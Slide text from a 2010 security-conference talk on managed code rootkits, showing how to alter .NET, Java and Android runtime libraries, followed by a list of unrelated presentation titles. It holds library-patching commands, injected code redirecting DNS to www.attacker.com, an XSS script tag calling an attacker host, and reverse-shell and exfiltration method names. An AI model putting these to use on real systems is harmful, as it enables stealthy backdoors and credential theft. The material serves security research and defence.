Managed Code Rootkits Hooking into Runtime Environments

Managed Code Rootkits Hooking into Runtime Environments April 23, 2010 Erez Metula | Founder Application Security Consultant & Trainer ErezMetula@AppSec.co.il

DEMO – println(string s)goes crazy..or how to make code do more than it should • Trivial question: What should be the output of the following (Java) code? class HelloWorld { public static void main(String args[]) { System.out.println("Hello World!"); } } • A simple PoC of language modification. “println()” was modified to print every string twice • Let’s see how runtime manipulations are used maliciously

Agenda • Introduction to managed code execution model • What are Managed Code Rootkits? • Application VM modification and malware deployment • Interesting attack scenarios (+ DEMOS!) • ReFrameworker 1.1 – Generic Framework modification tool

Background • I started playing with the idea of Managed Code language modification back in late 2008 • It began with my whitepaper titled “ .NET Framework Rootkits – Backdoors inside your Framework” • Presented in BlackHat, Defcon, CanSecWest, RSA, OWASP, etc.. • Extended the concept to other managed code frameworks – Java, Dalvik, Adobe AVM, etc.. • The book is coming soon • Published by Syngress • Covering information gathered while researching MCR • Covers MCR deployment and attack vector techniques

What is managed code? • Code that executes under the management of an application virtual machine (“sandbox”)

Write once, run everywhere

Managed code platforms – some examples • Java & .NET were chosen as case studies • Execution model similar to each other and to other platforms • Used today by most new development projects

Overview of application VM execution model Source code Compile Intermediate language (IL) bytecode APP Loaded VM (Java, .NET, Dalvik, etc..) Load a class from the runtime class library IL Loader .Net VM JIT Class library DLL Machine instructions (ASM) JAR … Execution Machine specific code

What are MCR (Managed Code Rootkits)? • Application level rootkits, acting as "root" from inside of the VM Runtime • Injected into • Runtime class libraries manipulation • The JIT compiler • AOP (Aspect Oriented Programming) weavers • From the outside (the OS), MCR looks like user-mode rootkits • From the inside (the VM), it behaves as kernel-level rootkits • It has access to internal core components • It has access to low level, private methods

Changing internal definitions of a programming language runtime • Changing the runtime internal definitions • Methods (Functions), Default values, Instructions, Event handlers, etc. • Changing the Runtime influences the execution flow of applications depending on it • Creating an “alternate reality” for applications • Adding code to it will make it run as part of the sandbox

Why are Managed Code rootkits attractive for attackers? • Single control point • Large attack surface • VM’s are Installed/preinstalled on almost every machine • Traditional security products are not aware of what’s going on inside the VM • They do not understand intermediate language bytecodes • They can not tell whether the application behavior is legit • Universal rootkits - write once, deploy many

More reasons.. • Forensics procedures seldom verify that managed code runtimes are not polluted with MCR • Developers backdoors are hidden from code review audits • Managed code becomes part of the OS. • Especially critical for managed code OS (Singularity project) • Object Oriented malware • Influencing inheritance, extending base classes, interfaces, etc. • Taking advantage of OO concept such Polymorphism to deploy generic malicious objects • Attaching into object instances passes by reference

MCR can deceive the applications • MCR makes the VM to lie and maneuver the applications it's supposed to serve • Desktop applications, services, web apps, etc.. • Implementing stealth capabilities, executing OS commands, manipulate sensitive application logic, stealing sensitive information, manipulating configuration files, destroying sensitive data, spying on the end user, etc.. • Applications cannot detect the presence of a MCR. • The Runtime, acting as a TCB (Trusted Computing Base) can no longer be trusted

Understanding the common attack vectors • Messing with the sandbox usually requires admin privileges (ACL restriction) • It means that MCR might be deployed when executing code as administrator. • Common attack vectors: • Housekeeping - Attacker gains admin access to the machine and want to keep controlling it • The “Trusted Insider” – trusted employee who abuses his admin privileges (IT admin, Developer, DBA..) • Spreading MCR using malware

Overview - class libraries manipulation Application static void Main(string[] args) { //DO SOMETHING //EXAMPLE: call RuntimeMethod RuntimeMethod(); } public void RuntimeMethod () { //The implementation of RuntimeMethod () //Implementation code //….. } Runtime Class Libraries public void RuntimeMethod () { //The implementation of RuntimeMethod () //DO SOMETHING DIFFERENT } OS APIs and services Hacked

Example - .NET rootkits class manipulation • Overview of .NET Framework modification steps • Locate the DLL in the GAC, and disassemble it ILDASM mscorlib.dll /OUT=mscorlib.dll.il /NOBAR /LINENUM /SOURCE • Modify the MSIL code, and reassemble it ILASM /DEBUG /DLL /QUIET /OUTPUT=mscorlib.dll mscorlib.dll.il • Force the Framework to use the modified DLL c:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089 • Avoiding NGEN cached Native DLL ngen uninstall mscorlib • Remove traces with NGEN • The assembler / disassembler pair used for this task are ilasm.exe and ildasm.exe (from the .NET SDK)

Example - Java rootkits class manipulation • Overview of Java JVM modification steps • Locate the class (usually in rt.jar) and extract it: jar xf rt.jar java/io/PrintStream.class • Dissassemble it (using Jasper disassembler) Java –jar jasper.jar PrintStream.class • Modify the bytecode • Assemble it (using Jasmin assembler) Java –jar jasmin.jar PrintStream.j • Deploy the modified class back to its location: jar uf rt.jar java/io/PrintStream.class • The assembler / disassembler pair used for this task are Jasmin and Jasper

Example – Dalvikrootkits (Google Android) class manipulation • Dalvik is google’s variation of the JVM • Runs Java executables that were converted to dex • Overview of Dalvik modification steps • Extract class.dex (usually from framework.jar) jar xf framework.jar classes.dex • Dissassemble it (using baksmali disassembler) java -jar baksmali.jar -o somedirectory/ classes.dex • Modify the bytecode • Assemble it (using smali assembler) java -Xmx512M -jar smali.jar somedirectory/ -o classes.dex • Deploy the modified class back to its location: jar uf framework.jar classes.dex • The assembler / disassembler pair used for this task are smali and baksmali

Attack vector - Reporting false information • MCR deceives the applications by providing false information • Mask the existence of specific: • Files • Directories • Processes/threads • Registry keys • Database records • Etc.. • Report false information about their associated • Time, name, size, signatures • Lie about whether an operation succeeded or not • Etc..

Attack vector - Backdoors • Scenario - Conditional authentication bypass • Attack on Authenticate() method influence the login pages of all applications at once • Server side attack • Especially dangerous for web hosting machines • “MagicValue” as a master key allowing login to any account: Original code starts here

Attack vector - False sense of security • False sense of security is our worst enemy • “False sense of security is worse than a true sense of insecurity“ • Relying too much on the security mitigations • It makes you believe you did the right thing • It makes you believe you are protected

Example scenario - Tampering with Cryptographic libraries • Some scenarios: • Key fixation and manipulation • Key stealing (example - SendToUrl(attackerURL,key) ) • Algorithm downgrading (AES -> DES, CBC -> ECB, etc..) Modified Original image Encrypted (AES, ECB mode)

Method injection - Adding “malware API” • Wrapping code blocks as “genuine” Runtime methods and classes • Extend the Runtime with general purpose “malware API” • Some advantages • Parameter passing • Code reuse • Code size reduction • Examples • private void SendToUrl(string url, string data) • private void ReverseShell(string ip, int port) • private void HideFile (string fileName) • Public void KeyLogEventHandler (Event e) • Etc…

Attack vector - Sending sensitive information to the attacker • The injected method “SendToUrl(string url, string data)" is used to transfer information to the attacker • The MCR waits for sensitive information handled by the Runtime • Passwords • Encryption keys • Connection strings • Etc.. • When such information is detected, it is sent to the attacker

Example Scenario - Stealing authentication credentials • Sending Stealing credentials from inside of the runtime shared Authenticate() method Example: http://www.RichBank.com/formsauthentication/Login.aspx

Attack vector - DNS manipulation • Manipulating DNS queries / responses • Example (Man-In-The-Middle) • Fixate the runtime DNS resolver to return a specific IP address, controlled by the attacker • Dns::GetHostAddresses(string host) (.NET) • InetAddress::getByName(string host) (Java) • All communication will be directed to attacker • Affects ALL network API methods • Example: resolve victim -> attacker Injected code: public static InetAddress getByName(String s){ if(s.equals("www.ForexQuoteServer.com")) s = "www.attacker.com"; return getAllByName(s)[0]; }

DEMO – DNS Manipulation in Javademo – client side attack • Forex Server BT4 Linux www.ForexQuoteServer.com (local) www.attacker.com

Automating the process with ReFrameworker V1.1 • Things were getting very complicated to implement • I needed a general purpose Framework modification tool So I wrote one and called it ReFrameworker • Originally called “.NET-Sploit”. • Able to perform all previous steps • Extract target binary from the Framework • Inject code and perform required modifications • Generate deployers to be used on target machine • Easy to extend by adding new code modules

ReFrameworker module concept • Generic modules concept • Function – a new method • Payload – injected code • Reference – external DLL reference • Item – injection descriptor • Comes with a set of predefined modules • Most of the scenarios have a PoC using ReFrameworker • List of included items (partial list): • HideFile.item • HideProcess.item • Conditional Reverse shell.item • DNS_Hostname_Fixation.item • Backdoor forms authentication with magic password.item • Observe WriteLine() method execution and send to attacker.item • Print string twice using WriteLine(s).item • Send Heart Bit method execution signal to remote attacker.item

Item example <CodeChangeItem name="print twice"> <Description>change WriteLine() to print every string twice</Description> <AssemblyName> mscorlib.dll</AssemblyName> <AssemblyLocation>c:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089 </AssemblyLocation> <AssemblyCode> <FileName> writeline_twice.payload</FileName> <Location> <![CDATA[ instance void WriteLine() cil managed ]]> </Location> <StackSize> 8 </StackSize> <InjectionMode> Post Append </InjectionMode> </AssemblyCode> </CodeChangeItem> Target Location Hooking point Injected Code Mode (Pre / Post / Replace)

Example Scenario - Injecting the ReverseShell() method using ReFrameworker • Open a reverse shell to the attacker’s machine

DEMO - ReFrameworkerTargeted reverse shell (.NET) • Encoded version of netcat.exe as MSIL array (dropandpop) • Trigger - connect when the application “SensitiveApplication.exe” is executed Originalcode Modified code (pre injection) Pre injection

Attack vector - Literal values manipulation • Malware does not necessary have to be injected into code sections • Messing with “hard coded" values rather than code • constants, resources (images, strings, html code, etc.), class variables initialized values, constructor values defaults, static member values, etc.. • Scenario – Inject permanent code into HTML templates • Permanent XSS • Browser exploitation frameworks • Example – injecting a permanent call to XSS shell: <script src="http://www.attacker.com/xssshell.asp?v=123"></script> • Defacement • Proxies / Man-in-the-Middle

Attacking the “Object” class • All classes automatically extend the class “Object” • Object contains generic code that is shared among all the other objects • Injecting a new method to “Object” class will influence ALL existing classes

Universal rootkit • The VM generates machine specific code for different platforms • Modified classes are platform independent • The same malware class can be used on Windows, Linux, Mac, Mobiles, etc.

The bad news • Another attack vector to worry about • Poor awareness regarding this subject • Enables performing cross platform sophisticated attacks • More significant when we’ll have managed code OS • MCR implemented inside Managed code OS are equivalent to kernel level rootkits of today's operating systems

The good news – A hardened VM Framework • The same “rootkit like” techniques used by malware can be used by legitimate software for better protection • Many AV uses rootkit techniques to protect themselves • It can be used to create “Hardened VM Framework”, to protect against application level vulnerabilities • Create a set of restriction rules • Protecting from errors caused by developers • Can be used to enforce secure coding practices • ReFrameworker can be used as a tool that implements such restriction

Create your own customized hardened framework • Code that runs on the hardened VM must obey specific rules • The VM is fixated to use secure defaults, while disabling the rest • Some examples • Disable dangerous mechanisms • Example - Disable dynamic SQL queries leading to SQL Injection • Perform automatic HTML encoding (XSS mitigation) • Confuse banner grabbing techniques • Example - Make a Java app to look like a .NET app • Disable detailed error messages • Allow only secure crypto algorithms and operations • Example - Remove the ability to use DES, Remove ECB mode, etc.. • Enforce secure authentication modes • Example - Encryption in Basic authentication, forms authentication, etc..

Summary • Malicious code can be hidden inside an application runtime VM, as an alternative malware “playground” • Can lead to some very interesting attacks • It does not depend on specific vulnerability, and is not restricted to a specific application VM • ReFrameworker, a generic framework modification tool, simplifies the process of Runtime modification • The power of MCR like techniques can also be used by us, the good guys

Questions ?

Thank you ! Reach me at ErezMetula@AppSec.co.il Code, tools, PoC, etc. can be found here: http://www.AppSec.co.il

Managed Code Rootkits Hooking into Runtime Environments

Managed Code Rootkits Hooking into Runtime Environments

Presentation Transcript

Bringing existing managed code into Metro style apps

Rootkits

Windows Rootkits – Userland API Hooking

Runtime Environments Chapter 7 in textbook

Runtime Environments

Runtime Environments

Chapter 7: Runtime Environments

Managed Environments

Rootkits

Rootkits

Managed Code

Rootkits

Runtime Environments

CSc 453 Runtime Environments

Managed Learning Environments

Runtime Environments

Chapter 7: Runtime Environments

Hooking into WordPress

CSc 453 Runtime Environments